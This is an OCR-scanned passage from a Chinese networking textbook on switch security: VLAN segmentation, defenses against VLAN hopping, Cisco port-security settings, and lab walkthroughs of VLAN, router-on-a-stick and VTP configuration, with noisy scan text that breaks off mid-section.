2. 利用 虚拟 局 域 网 技术 限制 局 域 网 广播 及 ARP 攻击 范围 


由 于 以 太 网 是 基于 CSMA/CD 机 制 的 网 络 ,不 可 避免 地 会 产生 包 的 广播 和 冲突 。 而 数 
据 广播 会 占用 带宽 ,也 影响 安全 ,在 网 络 比 较 大 、 比 较 复 杂 时 有 必要 使 用 虚拟 局 域 网 VLAN 
技术 来 减少 网 络 中 的 广播 ,同时 VLAN 还 能 有 效 地 将 ARP 攻击 限制 在 最 小 范围 内 。 

采用 VLAN 技术 基于 一 个 或 多 个 交换 机 的 端口 、 地 址 或 协议 将 本 地 局 域 网 逻辑 上 划分 
成 若干 个 组 ,每 个 组 形成 一 个 对 外 界 封闭 的 用 户 群 ,具有 自己 的 广播 域 ,组 内 广播 的 数据 流 
只 发 给 组 内 用 户 ,不同 VLAN 间 不 能 直接 进行 通信 ,组 间 通 信和 需要 通过 三 层 交换 机 或 路 由 
器 来 实现 ,从 而 增强 了 局 域 网 的 安全 性 。 


3. 强化 Trunk 端口 设置 避免 利用 封装 协议 缺陷 实行 VLAN 的 跳跃 攻击 


在 划分 VLAN 的 交换 机 中 端口 有 两 种 工作 状态 ,一 种 是 Access 状态 ,也 就 是 用 户主 机 
接 人 时 所 需要 的 端口 状态 ; 另 一 种 是 Trunk 状态 ,主要 用 于 跨 交换 机 的 相同 VLAN_ID 之 
间 的 VLAN 通信 。 

Access 状态 一 般 称 为 正常 状态 ,这 种 正常 状态 接口 接 入 主机 后 ,能 够 发 送 和 接收 正 
常 的 数据 帧 , 非 正 常 的 数据 帧 将 会 直接 丢弃 ,因此 这 种 状态 的 接口 对 攻击 者 攻击 往往 没 
有 什么 意义 ,能 引起 安全 的 问题 很 小 。 而 另 一 种 接口 的 状态 Trunk 则 会 引起 较 多 的 安全 
问题 。 

干道 技术 (Trunking) 是 通过 两 个 设备 之 间 点 对 点 的 连接 来 承载 多 个 VLAN 数据 传输 
的 一 种 方法 ,也 就 是 需要 将 接口 的 工作 模式 设置 成 干道 模式 (Trunk mode) ,让 它 来 承载 非 
标准 以 太 网 帧 跨越 多 个 交换 机 的 传递 。 此 处 标准 帧 指 未 添加 VLAN_ID 的 正常 数据 帧 ,而 
非 标准 帧 指 添 加 了 VLAN_ID 的 帧 。 封 装 VLAN 信息 的 协议 有 两 个 ,一 是 Cisco 私有 的 
ISLCInter-Switch Link); 二 是 作为 国际 标准 的 IEEE 802. 1Q( 俗 称 dot 1 Q)。802. 1Q 和 
ISL 标记 攻击 ,就 是 利用 实施 Trunk 时 使 用 的 这 两 个 协议 的 缺陷 来 实现 的 。 

在 实施 Trunk 时 ,可 以 不 进行 任何 命令 的 操作 , 即 可 完成 跨 交换 机 的 相同 VLAN_ID 
之 间 的 通信 。 这 是 因为 有 DTP(Dynamic Trunk Protocol) .也 就 是 在 所 有 的 接口 上 默认 使 
用 如 下 命令 。 


Switch(config- if) # switchport mode dynamic desirable 


这 条 命令 使 所 有 的 接口 都 处 于 自 适应 的 状态 ,会 根据 对 方 的 接口 状态 来 发 生 自 适应 的 
变化 。 对 方 是 Access, 就 设置 自己 为 Access; 对 方 是 Trunk, 就 设置 自己 为 Trunk。 除 了 
desirable 这 个 参数 以 外 ,还 有 一 个 和 它 功能 比较 相似 的 参数 一 一 Auto。 这 两 个 参数 其 实 都 
有 自 适应 的 功能 ,唯一 不 同 在 于 是 否 是 主动 的 发 出 DTP(Dynamic Trunk Protocol) 的 包 , 也 
就 是 说 是 否 主 动 的 和 对 方 进 行 端口 状态 的 协商 。Desirable 能 主动 发 送 和 接收 DTP 包 , 去 
积极 和 对 方 进行 端口 的 商讨 ,不 会 去 考虑 对 方 的 接口 是 否 是 有 效 的 工作 接口 ,而 Auto 只 能 
被 动 的 接收 DTP 包 , 如 果 对 方 不 能 发 送 DTP 消息 , 则 永远 不 会 完成 数据 通信 。 但 这 两 个 参 
数 实施 上 所 产生 的 安全 隐患 是 一 样 的 。VLAN 跳跃 攻击 往往 是 对 方 将 自己 的 接口 设 为 主 
动 自 适应 状态 ,那么 不 管用 哪个 参数 ,其 结果 是 完全 一 样 的 ,都 会 因为 对 方 接口 状态 而 发 生 
变化 。 这 样 的 两 个 参数 本 意 是 给 网 络 管理 人 员 减 轻 工 作 负担 ,加 快 VLAN 的 配置 而 产生 
的 。 但 随 着 网 络 的 不 断 发 展 , 针 对 这 个 特性 而 引发 的 安全 隐患 (比如 VLAN 的 跳跃 攻击 就 
是 利用 了 这 个 特性 ) , 越 来 越 引起 关注 。 

要 解决 这 个 安全 隐患 ,需要 进行 以 下 操作 。 

CD 将 交换 机 的 所 有 接口 都 强制 设 为 Access 状态 。 这 样 做 的 目的 是 当 攻击 者 设 定 自 
己 的 接口 为 Desirable 状态 时 ,怎么 协商 所 得 到 的 结果 都 是 Accsee 状态 ,使 攻击 者 没 法 利用 
交换 机 上 的 空闲 端口 ,伪装 成 Trunk 端口 ,进行 局 域 网 攻击 。 

(2) 在 需要 成 为 Trunk 的 接口 上 设置 Trunk 模式 (switchport mode trunk) ,就 是 强制 
使 端口 的 状态 成 为 Trunk。 不 会 去 考虑 对 方 接口 状态 ,也 就 是 说 不 管 对 方 的 接口 是 什么 状 
态 ,接口 都 是 Trunk。 需 要 注意 ,这 条 命令 仅仅 在 Trunk 的 真实 接口 上 设置 ,使 接口 在 状态 
上 是 唯一 的 ,可 控 性 明显 增强 了 。 

(3) 在 Trunk 的 接口 上 再 使 用 命令 “switchport trunk allowed vlan 10,20,30”。 这 条 
命令 定义 了 在 这 个 Trunk 的 接口 只 允许 VLAN10,20,30 的 数据 从 此 通过 。 如 果 还 有 其 
他 VLAN 存在 ,它们 的 数据 将 不 能 通过 这 个 Trunk 接口 通过 。 这 样 允 许 哪些 VLAN B 
过 ,哪些 不 能 通过 ,就 很 容易 实施 。 通 过 这 种 简单 控制 数据 流向 的 方法 即 可 达到 安全 的 
目的 。 

完成 上 述 用 于 提升 VLAN 安全 的 三 条 措施 后 ,所 有 这 些 接口 已 经 具备 了 较 高 的 安全 
性 ,而 与 此 同时 ,DTP 协议 依旧 在 工作 。 

在 配制 VLAN 时 ,还 可 以 实施 命令 “switchport nonegotiate”, 意思 就 是 不 协商 。 它 彻 
底 地 将 发 送 和 接收 DTP 包 的 功能 完全 关闭 。 在 关闭 的 DTP 协议 后 ,该 接口 的 状态 将 永 
远 稳定 成 Trunk, 接 口 的 状态 达到 了 最 大 的 稳定 性 ,最 大 化 避免 了 攻击 者 的 各 种 试探 
努力 。 

在 802. 1Q 的 Trunk 中 还 有 一 个 相关 的 安全 问题 , 那 就 是 Native VLAN。 众 所 周知 ， 
Cisco 的 Catalyst 系列 的 交换 机 中 有 几 个 默认 的 VLAN ,其 中 最 重要 的 一 个 就 是 VLAN 1, 
默认 情况 下 ,交换 机 的 所 有 以 太 网 接口 都 属于 VLAN 1。 而 且 在 配置 二 层 交 换 机 上 配置 IP 
地 址 时 ,也 是 在 VLAN 1 这 个 接口 下 完成 的 。 在 802. 1Q 的 干道 协议 中 ,每 个 802. 1Q 封装 
的 接口 都 被 作为 干道 使 用 ,这 种 接口 都 有 一 个 Native VLAN 并 被 分 配 Native VLAN ID 
(默认 是 VLAN 1),802. 1Q 不 会 标记 属于 Native VLAN 的 数据 帧 ,而 所 有 未 被 标记 
VLAN 号 的 数据 帧 都 被 视 为 Native VLAN 的 数据 。 那么 VLAN 1 作为 默认 的 Native 
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VLAN ,在 所 有 的 交换 机 上 都 是 相同 。 因 此 由 Native VLAN 引起 的 安全 问题 ,在 局 域 网 中 
必须 引起 重视 。 这 个 安全 隐患 的 解决 办 法 就 是 更 改 默认 Native VLAN, 可 以 用 命令 
“switchport trunk native vlan 99”。 这 条 命令 需要 在 一 个 封装 了 801. 1Q 的 接口 下 输入 , 它 
将 默认 的 Native VLAN 更 改 为 VLAN 99。 执 行 这 条 命令 后 ,Native VLAN 不 相同 的 交换 
机 将 无 法 通信 ,增加 了 交换 机 在 划分 VLAN 后 的 安全 性 。 


4. 使 用 交换 机 包 过 滤 技 术 增加 网 络 交 换 的 安全 性 


随 着 三 层 及 三 层 以 上 交换 技术 的 应 用 ,交换 机 除了 对 MAC 地 址 过 滤 之 外 ,还 支持 包 过 
滤 技 术 , 能 对 网 络 地 址 、 端 口号 或 协议 类 型 进行 严格 检查 ,根据 相应 的 过 滤 规 则 ,允许 和 /或 
禁止 从 某 些 节 点 来 的 特定 类 型 的 TP 包 进 入 局 域 网 交换 ,这 样 就 扩大 了 过 滤 的 灵活 性 和 可 选 
择 的 范围 ,增加 了 网 络 交换 的 安全 性 。 


5. 使 用 交换 机 的 安全 网 管 


为 了 方便 远程 控制 和 集中 管理 ,中 高 端 交 换 机 通常 都 提供 了 网 络 管理 功能 。 在 网 管 型 
交换 机 中 ,要 考虑 的 是 其 网 管 系统 与 交换 系统 相互 独立 , 当 网 管 系统 出 现 故障 时 ,不 能 影响 
网 络 的 正常 运行 。 

此 外 ,交换 机 的 各 种 配置 数据 必须 有 保护 措施 ,如 修改 默认 口令 、 修 改 简单 网 络 管理 协 
iX (Simple Network Management Protocol,SNMP) 密 码 字 ,以 防止 未 授权 的 修改 。 


6. 使 用 交换 机 集成 的 入 侵 检 测 技术 


由 于 网 络 攻击 可 能 来 源 于 内 部 可 信任 的 地 址 ,或 者 通过 地 址 伪装 技术 欺骗 MAC 地 址 
过 滤 , 因 此 仅 依赖 于 端口 和 地 址 的 管理 是 无 法 杜绝 网 络 入 侵 的 ,入 侵 检测 系统 是 增强 局 域 网 
安全 必 不 可 少 的 部 分 。 

高 端 交换 机 已 经 将 入 侵 检 测 代理 或 微 代码 增加 在 交换 机 中 以 加 强 其 安全 性 。 集 成 入 侵 
检测 技术 目前 遇 到 的 一 大 困难 是 如 何 跟 上 高 速 的 局 域 网 交换 速度 。 


7. 使 用 交换 机 集成 的 用 户 认证 技术 


目前 一 些 交换 机 支持 PPP, Web 和 802. 1x 等 多 种 认证 方式 。802. 1x 适用 于 接 人 设备 
与 接 人 端口 间 点 到 点 的 连接 方式 ,其 主要 功能 是 限制 未 授权 设备 通过 以 太 网 交换 机 的 公共 
端口 访问 局 域 网 ,结合 认证 服务 器 和 计 费 服务 器 可 以 完成 用 户 的 完全 认证 和 计 费 。 

目前 一 些 交换 机 结合 认证 服务 系统 可 以 做 到 基于 交换 机 、 交 换 机 端口 .IP 地 址 .MAC 
地 址 `VLAN .用户 名 和 密码 6 个 要 素 相 结合 的 认证 ,基本 解决 了 IP 地 址 盗用 ,用 户 密码 盗 
用 等 安全 问题 。 


10.3.2 交换 机 的 安全 配置 
前 面 所 述 路 由 器 登录 口令 .加 密 等 安全 措施 也 适用 于 可 网 管 的 交换 机 。 这 里 介绍 交换 


机 特有 的 安全 配置 方法 。 
为 了 限制 未 经 授权 的 用 户 计算 机 非法 接 和 ,在 交换 机 端口 采用 如 下 设置 。 


(1) 打开 该 接口 的 端口 安全 功能 ,命令 如 下 。 

Switch(config- if) # switchport port - security 

(2) 设置 端口 上 安全 地 址 的 最 大 个 数 ,命令 如 下 。 

Switch(config- if) # switchport port - security maximum number 

(3) 配置 处 理 违例 的 方式 ,命令 如 下 。 

Switch(config- if) # switchport port - security violation (protect |restrict |shutdown) 


此 处 括号 中 参数 为 可 选 的 针对 违例 发 生 时 的 处 理 模式 ,如 下 。 

* Protect; 当 安全 地 址 个 数 满 后 ,安全 端口 将 丢弃 未 知名 地 址 (不 是 该 端口 的 安全 地 
址 中 的 任何 一 个 ) 的 帧 。 

* Restrict: 当 有 违例 产生 时 ,交换 机 不 但 丢弃 接收 到 的 帧 (MAC 地 址 不 在 安全 地 址 
表 中 ) ,而 且 将 发 送 一 个 SNMP trap 报 文 。 

* Shutdown; 当 有 违例 产生 时 ,交换 机 将 丢弃 接收 到 的 帧 (MAC 地 址 不 在 安全 地 址 表 
中 ) ,发送 一 个 SNMP trap 报 文 ,而 且 端 口 关闭 。 


[1555 10711 某 公 司 交 换 机 安全 配置 一 一 限制 访问 


某 公 司 内 部 局 域 网 的 拓扑 图 如 图 10-2 所 示 。 在 接 入 交换 机 上 配置 端口 安全 策略 ,限制 


未 经 允许 的 计算 机 随意 接 入 公司 局 域 网 内 ,其 配置 过 程 如 下 。 


à 


PC1:192.168.1.1/24 — PC2:192.168.1.2/24.— PC3:192.168.1.3/24.— PC4:192.168.1.4/24 


图 10-2 某 公司 局 域 网 拓扑 图 


CD 局 域 网 内 计算 机 按 图 中 所 示 配 置 好 TP 地 址 ,相互 之 间 能 够 ping 通 。 
(2) 查看 交换 机 的 MAC 地 址 表 , 结 果 如 下 。 


Switch> enable 
Switch# show mac — address - table 
Mac Address Table 


Vlan Mac Address Type Ports 
1 0001. 4333.aa33 DYNAMIC Fa0/3 
$ 0001. c9d7. ea02 DYNAMIC Fa0/1 
1 00d0. 58e2.alb5 DYNAMIC Fa0/4 
1 00e0. £71d. 11ed DYNAMIC Fa0/2 
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Switch# 


(3) 配置 交换 机 端口 安全 ,命令 如 下 。 


Switch# 

Switch# conf t 

Switch(config) # interface fastEthernet 0/1 
Switch(config- if)# switchport mode access 
Switch(config- if) # switchport port - security 


在 一 些 三 层 交 换 机 上 还 需 进行 IP 地 址 绑 定 ,命令 如 下 。 


Switch(config- if) # switchport port — security mac — address 0001 C9D7 EA03 ip- address 192. 
168.1.1) 

Switch(config- if) # switchport port - security maximum 1 
Switch(config- if) # switchport port - security violation shutdown 
Switch(config- if) # exit 

Switch(config) # interface fastEthernet 0/2 

Switch(config- if) # switchport mode access 

Switch(config- if) # switchport port - security 

Switch(config- if) # switchport port - security mac — address sticky 
Switch(config- if) # switchport port - security maximum 1 
Switch(config- if) # switchport port - security violation shutdown 
Switch(config- if) # end 

Switch# 


(4) 再 次 查看 交换 机 的 MAC 地 址 


Switch# show mac - address - table 
Mac Address Table 


Vlan Mac Address Type Ports 
1 0001. 4333. aa33 DYNAMIC Fa0/3 
1 0001. c9d7. ea02 STATIC Fa0/1 
1 00d0. 58e2.alb5 DYNAMIC Fa0/4 
1 00e0. £71d. 11ed DYNAMIC Fa0/2 
Switch# 


G) 再 次 测试 4 台 计 算 机 之 间 的 连通 性 ,发 现 4 台 计 算 机 依然 能 够 正确 连接 并 相互 通 
信 , 如 图 10-3 所 示 。 


图 10-3 ”测试 4 台 计算 机 之 间 的 连通 性 


(6) 测试 如 果 有 另外 一 台 计 算 机 (MAC 地 址 为 0001 C9D7 EA03) 接 入 交换 机 的 0/1 
端口 ,这 里 将 PCI 的 MAC 地 址 改 成 另 一 个 地 址 ,如 图 10-4 所 示 。 


qu 
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图 10-4 PCI 计算 机 MAC 地 址 的 改变 
(7) 观察 线路 的 连接 状况 ,如 下 。 


Switch# ch interfaces fa0/1 
Fast Ethernet 0/1 is dowsn, line protocol is down (err— disabled) 
Hardware is Lance, address is 0001.63d9.1b01 (bia 0001.63d9.1b01) 
BW 100000 Kbit, DLY 1000 usec, 
reliability 255/255, txloab 1/255, rxload 1/255 
Encapsulation APPA, loopback not set 
Keepalive set (10 sec) 


(8) 交换 机 的 MAC 地 址 表 如 下 。 


Switch# sh mac - address - table 
Mac Address Table 


1 0001. 4333. aa33 DYNAMIC Fa0/3 

1 00d0. 58e2.alb5 DYNAMIC Fa0/4 

1 00e0. f71d. 11ed DYNAMIC Fa0/2 
Switch# 


(9) 此 时 测试 四 台 计 算 机 之 间 的 连通 性 ,PC1 处 于 不 通 状态 。 

通过 查看 MAC 地 址 表 结 果 发 现 ,更 改过 MAC 地 址 的 PCI 连接 交换 机 端口 
fastethernet0/1 已 经 处 于 关闭 状态 (shutdown) ,PC 的 连接 指示 灯 也 是 关闭 状态 ,因为 PCI 
的 MAC 地 址 做 了 更 改 , 不 再 是 原来 的 MAC 地 址 ,所 以 ,交换 机 会 根据 MAC 地 址 和 端口 安 
全 策略 来 判断 改 后 的 MAC 地 址 是 一 个 非法 访问 地 址 ,同时 执行 设置 的 端口 安全 保护 策略 
(shutdown) 将 该 端口 自动 关闭 ,以 便 更 安全 地 保护 交换 机 的 这 个 端口 。 


10-2] 某 公司 交换 机 端口 安全 配置 


公司 交换 机 千 兆 端口 gigabitethernet 1⁄3 上 配置 端口 安全 功能 ,设置 地 址 最 大 个 数 
为 8, 设置 违例 方式 为 protect, 配 置 过 程 如 下 。 


Switch# 

Switch# conf t 

Switch(config) # interface gigabitehternet 1/3 

Switch(config — if) # switchport mode access 

Switch(config - if) # switchport port — security 

Switch(config - if) # switchport port - security maximum 8 
Switch(config- if) # switchport port — security violation protect 
Switch(config- if) # end 

Switch 


实践 


除了 上 述 设 置 之 外 ,一 些 配 置 和 查看 安全 端口 的 其 他 常用 命令 如 下 。 
CD 配置 安全 端口 上 的 安全 地 址 。 


Switch(config- if) # switchport port — security [mac — address mac — address ip- address ip- address] 


(2) 当 端 口 由 于 违规 操作 而 进入 err-disable 状态 后 ,必须 在 全 局 模式 下 使 用 如 下 命令 
手工 将 其 恢复 为 UP 状态 。 


Switch(config) # errdisable recovery 

(3) 设置 端口 从 err-disable 状态 自动 恢复 所 等 待 的 时 间 。 
Switch(config) # errdisable recovery interval time 

(4) 配置 安全 地 址 的 老化 时 间 。 

Switch(config — if) # switchport port - security aging{ static | time time] 
(5) 关闭 一 个 接口 的 安全 地 址 的 老化 功能 (老化 时 间 为 0) 。 
Suitch(config- if) # no switchport port - security aging time 
(6) 使 老化 时 间 仅 应 用 于 动态 学 习 到 的 安全 地 址 。 
Suitch(config- if) # no switchport port — security aging static 
(7) 显示 所 有 接口 安全 设置 状态 .违例 处 理 等 信息 。 
Switch# sh port - security interface [ interface - id] 

(8) 查看 安全 地 址 信息 、 显 示 安 全 地 址 及 老化 时 间 。 


Switch# sh port - security address 


显示 结果 如 下 。 
Vlan Mac Address Ip Address Type Port Remaining Age(mins) 
$ 00d0. f800.073c 192.168.2.202 configured £0/3 8 1 


(9) 显示 所 有 端口 的 安全 统计 信息 ,包括 最 大 安全 地 址 数 、 当 前 安全 地 址 数 以 及 违例 处 
理 方式 。 


Switch£ sh port- security 


显示 结果 如 下 。 
Secure Port Max Secure Addr Current Addr Securety Action 
Gi 1/3 8 d Protect 


下 面 介绍 虚拟 局 域 网 (VLAN) 的 配置 。 
(1) 单个 交换 机 VLAN 配置 。 
(D 单个 交换 机 划分 VLAN 的 实验 拓扑 如 图 10-5 所 示 。 


J Boson Network Designer? 
File Wizard Help 
Devices and Connectors | 
+ @ZBB Available Routers 
oe Available Switches 

E P 1900 Series 

E 2900 Sesies 

c 3500 Series 

p 3550 

Hodie Available Connectors 
E Ë Other Devices 


am 


PC Information 


Desktcp Computer 


图 10-5 划分 VLAN 实验 拓扑 
© 在 特权 模式 下 配置 VLAN ,命令 如 下 。 


SW1# vlan database 

SWl(vlan) # vlan 100 name VLAN 100 

SW1(vlan) # vlan 200 name VLAN 200 

@ 在 全 局 模式 下 配置 VLAN 的 方法 在 实验 用 模拟 器 环境 下 不 支持 ,但 在 真实 的 交换 
机 上 是 可 以 使 用 的 。 配 置 命令 如 下 。 

SW1(config) # vlan 100 

SWl(config- vlan) # name VLAN 100 

SWl(config- vlan) # exit 

© 添加 接口 到 VLAN 中 ,如 图 10-6 所 示 。 

© 对 划 入 VLAN 的 计算 机 进行 连通 性 测试 ,PC1 ping PC2, 不 通 ,如 图 10-7 所 示 。 

在 将 连接 PC3 的 端口 fa0/3 划 入 上 述 VLAN 100 的 情况 下 ,PC1 ping PC3, 通 ,如 
图 10-8 所 示 。 

(2) 通过 路 由 器 单 臂 路 由 实现 跨 VLAN 访问 的 设置 。 

通过 配置 路 由 器 单 臂 路 由 ,使 在 不 同 VLAN 之 间 的 PC 之 间 能 相互 通信 的 实验 拓扑 如 
图 10-9 所 示 。 


Boson NetSim? v 5.31 —— Control Panel — [SW1] 


Vé; File Modes Devices Tools Urdering Language Window Help 


. RM o. m 


eSwitches E Meter Remote Control 


swain 

SWiWconfigure terminal 

Enter configuration commands, one per line. End with CNIL/Z. 
SWi(config)Hinterface FastEthernet 0/1 
SWi(config-if)lswitohport access vlan 100 
SWi(config-if)Wswitchport mode access 

SWi(config-if)Wend 

SWiWshow vlan 


Fa0/2, Fa0/3, Fa0/4, Fa0/5 


Fa0/6, Fa0/7, Fa0/8, Fa0/9 
Fa0/10, Pa0/11, Fa0/12 
active Fa0/1 


active 
fddi-defaull active 
token-ring-default active 
fadinet default active 
trnet-default active 


Type RingNo BridgeHo BrdgMode Transi Trans2 


100001 
100100 
100200 
101002 
101003 
101004 
101005 


20091013. 


图 10-6 ”接口 加 入 到 VLAN 中 


Boson HetSia? v 5.31 — Control Panel - [eStation 1] MAR) 
File Modes Devices Tools Ordering Language Windev Kelp -Bx 


[2] E s. M 


eRouters eStations Lab Navigator 


a 


Renote Control 


:>ping 192.168.1.2 
inging 192.160.1.2 with 32 bytes of data: 


imed out. 
timed out. 

ed ont. 
timed out. 
timed ont. 


ing statistics for 192.160.1. 
Packets: 5, Received = (1009 loss), 


2069-10-16. 20:27 


10-7 PCI ping PC2 结果 


< Boson HetSim? v 5.31 — Control Panel — [eStation 1] 


Ši File Modes Devices Tools Ordering Language Window Help 


. M . E . ë m 


eSri tehes eStations Lab Navigator Fetllap Remote Control 


ping 192.168.1.3 
inging 192.168.1.3 with 32 bytes of data: 


eply from 192.168.1.3: bytes-32 time-6Ums TTL-241 
Reply from 192.168.1.3: bytes-32 time-60ms TTL-241 
Reply from 192.168.1. byles-32 Lime-60ms TTL-241 
Reply from 192.168.1. bytes-32 tim Oms TTL-241 
Reply from 192.168.1.3: hytes-32 time-&üms TTL-241 


ing statistics for 192.168.1.3: Packets: Sent - 5, Received - 5, 
Lost = 0 (0% loss), 
Approximate round trip times in milli-seconüs: 

Minimum = 50ms, Maximum = 60ms, Average = 


2009-10-15 


10-8 PCI ping PC3 结果 


y 
1841 | 
"| 
I 
一 一 Ue — 
F Switch0 4 ] 
= — 
PC-PT PC-PT 
PC0 PCI 
192.168.108.10 192.168.1.10 
2 5.0 255.255.255.0 


192.168.108.1 


10-9 单 臂 路 由 器 实现 跨 VLAN 访问 拓扑 
(D 将 Router 的 fa 0/0 端口 打开 ,具体 命令 如 下 


Router > en 

Router # conf t 
Router(config) # inter fa 0/0 
Router (config) # no shut 


© 规划 并 设置 计算 机 TP 地 址 如 下 

。 Pc0: IP 地 址 -192. 168. 108. 10; 子 网 掩 码 -255 5.0; 默认 网 关 -192. 168. 108. 1。 

° Pcl: IP 地 址 -192. 168. 1. 10; 子 网 掩 码 -255. 255. 255. 0; 默认 网 关 -192. 168. 1. 1。 

G 在 Switch2 上 创建 VLAN 10 和 VLAN 100, 并 将 与 PC2、PC3 机 相连 的 接口 fa0/2 和 
fa0/24 划 入 相应 的 VLAN 10 和 VLAN 100。 配 置 命令 如 下 。 


255. 2 


实践 


Switch> en 

Switch£ conf t 

Switch(config) # vlan 10 

Switch(config- vlan) # exit 
Switch(config) # int fa 0/2 
Switch(config- if) # switch access vlan 10 
Switch(config) # exit 

Switch(config) # vlan 100 

Switch(config- vlan) # exit 
Switch(config) # int fa 0/24 
Switch(config- if) £& switch access vlan 100 
Switch(config) # exit 

Switch(config) # 


@ 将 交换 机 与 路 由 器 相连 的 接口 的 fa 0/1 设置 为 trunk 模式 ,具体 命令 如 下 。 


Switch(config) # inter fa 0/1 
Switch(config- if) # switch mode trunk 
Switch(config- if) # exit 


© 在 路 由 器 全 局 配置 模式 下 创建 fa 0/0. 10 虚拟 子 接口 ,封装 其 VLAN 10 的 数据 格式 
802. 1Q ,并 设置 子 接口 的 IP 地 址 为 PCO 的 网 关 地 址 ,最 后 将 子 接口 激活 。 在 路 由 器 全 局 配 
置 模式 下 创建 fa 0/0. 100 虚拟 子 接口 ,封装 其 VLAN 100 的 数据 格式 ,并 设置 子 接口 的 IP 
地 址 为 PC1 的 网 关 地 址 ,最 后 将 子 接口 激活 。 具 体 命令 如 下 。 


Router # conf t 

Router(config) # inter fa 0/0.10 

Router(config- subif) # en 

Router(config- subif) # encapsulation dot10 10 
Router(config- subif) # ip add 192. 168. 108. 1 255. 255. 255. 0 
Router (config — subif) # no shut 

Router(config- subif) # exit 

Router(config) # inter fa 0/0. 100 

Router(config- subif) # en capsulation dot1Q 100 
Router(config- subif)# ip add 192.168.1.1 255.255.255.0 
Router(config- subif) # no shut 

Router(config) # exit 

Router(config) # 


(6 从 PCO ping PCI 或 从 PC1 ping PC0, 如 图 10-10 所 示 。 

CD 通过 show ip route 查看 路 由 表 , 如 图 10-11 所 示 。 

在 网 络 层 ,将 目的 IP 192. 168. 1. 10 和 路 由 表 的 第 一 个 表 项 的 网 络 的 子 网 掩 码 进行 相 
与 ,得 到 192. 168. 1.0 ,与 网 络 相 匹 配 ,数据 转送 到 虚拟 子 接口 fa 0/0. 100, 到 达 目 的 网 络 进 
行 直接 交付 。 


Packet Tracer DC Command 


PC»ipconfiq 


IP Address. 


Suhnet Mask. 


192.168.108.10 
z 255.255.255.0 


Default Saceway- 192.168.108.1 


PC»ping 192.168.1.10 


Pinging 192.168.1.10 with 32 bytes of data- 


Request timed out 
Reply from 192.168.1.10: bytes-32 time-109ms TIL-127 
Reply from 192 168 1 10- bytes=32 time-125ma TTL-127 
Reply from 192 .168.1.10- bytes-i2 time-125ma 


Ping statistics for 192.168.1.10: 


Packets 


Sent = 4, Received = 3, Lo 1 (25% loss), 


Approximate round trip times in milli-seconds- 
Minimum = 109ms, Maximus = 125ms, Average = 119m« 


Pucket Tracer DC Command Lime 1.0 
PC»ipconfig 


IP Address 
Subnet Mask z s 
Default Gateway 192.168.1.1 


- 192.168.1.10 
= 255.255.255.0 


PC»ping 192.168.108.10 


Pinging 192.168.108.10 with 32 bytes of data: 


Reply from 192.168.108.10 


time-125ms TTL-127 


Reply from 192.168.108.10 
Reply from 192.168.108. 
Reply from 192.168.108.10- 


Ping statistics for 192.168.108. 
Sent = 4, Received Iost = 0 (0$ los), 
Approximate round trip times in milli-seconde 

Minimum = llüms, Maximum = 125ms, Average = 121m« 


Packets: 


ec 


图 10-10 PCO 5 PCI 连通 性 


10-11 路 由 器 的 路 由 表 


网 络 中 拥有 核心 交换 机 的 VLAN 配置 


某 单位 局 域 网 由 一 


e 


TT 


4 备 三 层 交 换 功 能 的 核心 交换 机 连接 3 台 接 入 交换 机 (不 


备 三 层 交 换 能 力 )。 核 心 交换 机 名 称 为 com, 接 入 交换 机 分 别 为 parl、par2、par3, 分 


实践 


port 1 的 光线 模块 与 核心 交换 机 相连 ,并 且 假 设 VLAN 名 称 分 别 为 counter、 market, 
managing 等 。 整 个 配置 过 程 包括 设置 vtp domain (核心 、 接 入 交换 机 上 都 设置 )、 配 置 
Trunk( 核 心 、 接 入 交换 机 上 都 设置 )、 创 建 VLAN CHE server. 上 设置 ) .将 交换 机 端口 划 入 
VLAN 及 配置 三 层 交 换 等 步骤 。 

(1) 设置 管理 域 vtp domain。 

交换 VTP 更 新 信息 的 所 有 交换 机 必须 配置 为 相同 的 管理 域 。 如 果 所 有 交换 机 都 以 中 
继 (干道 ) 线 相连 ,那么 只 要 在 核心 交换 机 上 设置 一 个 管理 域 , 网 络 上 所 有 的 交换 机 都 加 入 该 
域 ,这 样 管理 域 里 所 有 的 交换 机 就 能 够 了 解 彼此 的 VLAN 列表 。 命令 如 下 。 


com# vlan database // 进 入 VLAN 配置 模式 
com(vlan) # vtp domain com // 设 置 VIP 管理 域名 称 com 
com(vlan) # vtp server // 设 置 交 换 机 为 服务 器 模式 
par1 # vlan database // 进 入 VLAN 配置 模式 
parl(vlan) # vtp domain com // 设 置 VIP 管理 域名 称 com 
parl(vlan) # vtp client // 设 置 交换 机 为 客户 端 模式 
par2 # vlan database // 进 入 NLAN 配置 模式 
par2(vlan) # vtp domain com // 设 置 VTP 管理 域名 称 com 
par2(vlan) # vtp client // 设 置 交 换 机 为 客户 端 模 式 
par3 # vlan database // 进 入 NLAN 配置 模式 
par3(vlan) # vtp domain com // 设 置 VIP 管理 域名 称 com 
par3(vlan) # vtp client // 设 置 交 换 机 为 客户 端 模 式 


注意 这 里 设置 核心 交换 机 为 server 模式 是 允许 在 该 交换 机 上 创建 修改、 删除 VLAN 
及 其 他 一 些 对 整个 VTP 域 的 配置 参数 ,同步 本 VTP 域 中 其 他 交换 机 传递 来 的 最 新 的 
VLAN 信息 ; client 模式 是 指 本 交换 机 不 能 创建 .删除 .修改 VLAN 配置 ,也 不 能 在 nvram 
中 存储 VLAN 配置 ,但 可 同步 由 本 VTP 域 中 其 他 交换 机 传递 来 的 VLAN 信息 。 

(2) 配置 Trunk。 为 了 保证 管理 域 能 够 覆盖 所 有 接 入 交换 机 ,必须 配置 Trunk, 

Cisco 交换 机 能 够 支持 任何 介质 作为 中 继 (干道 ) 线 ,为 了 实现 Trunk 可 使 用 其 特有 的 
isl 标签 。isl(inter-switch link) 是 一 个 在 交换 机 之 间 、 交 换 机 与 路 由 器 之 间 及 交换 机 与 服务 
器 之 问 传递 多 个 VLAN 信息 及 VLAN 数据 流 的 协议 ,通过 在 交换 机 直接 相连 的 端口 配置 
isl 封装 , 即 可 跨越 交换 机 进行 整个 网 络 的 VLAN 分 配 和 进行 配置 。 

核心 交换 机 端 配置 如 下 。 

com(config) # interface gigabitethernet 2/1 

con(config- if) # switchport 

com(config- if) switchport trunk encapsulation isl NN 配置 trunk 协议 

com(config- if) # switchport mode trunk 

con(config) # interface gigabitethernet 2/2 

con(config- if) # switchport 

com(config- if) # switchport trunk encapsulation is NN 配置 trunk 协议 

com(config- if) # switchport mode trunk 

con(config) # interface gigabitethernet 2/3 

com(config- if) # switchport 

con(config- if) # switchport trunk encapsulation isl NUR trunk 协议 

com(conf ig — if) # switchport mode trunk 


接 人 交换 机 端 配置 如 下 。 


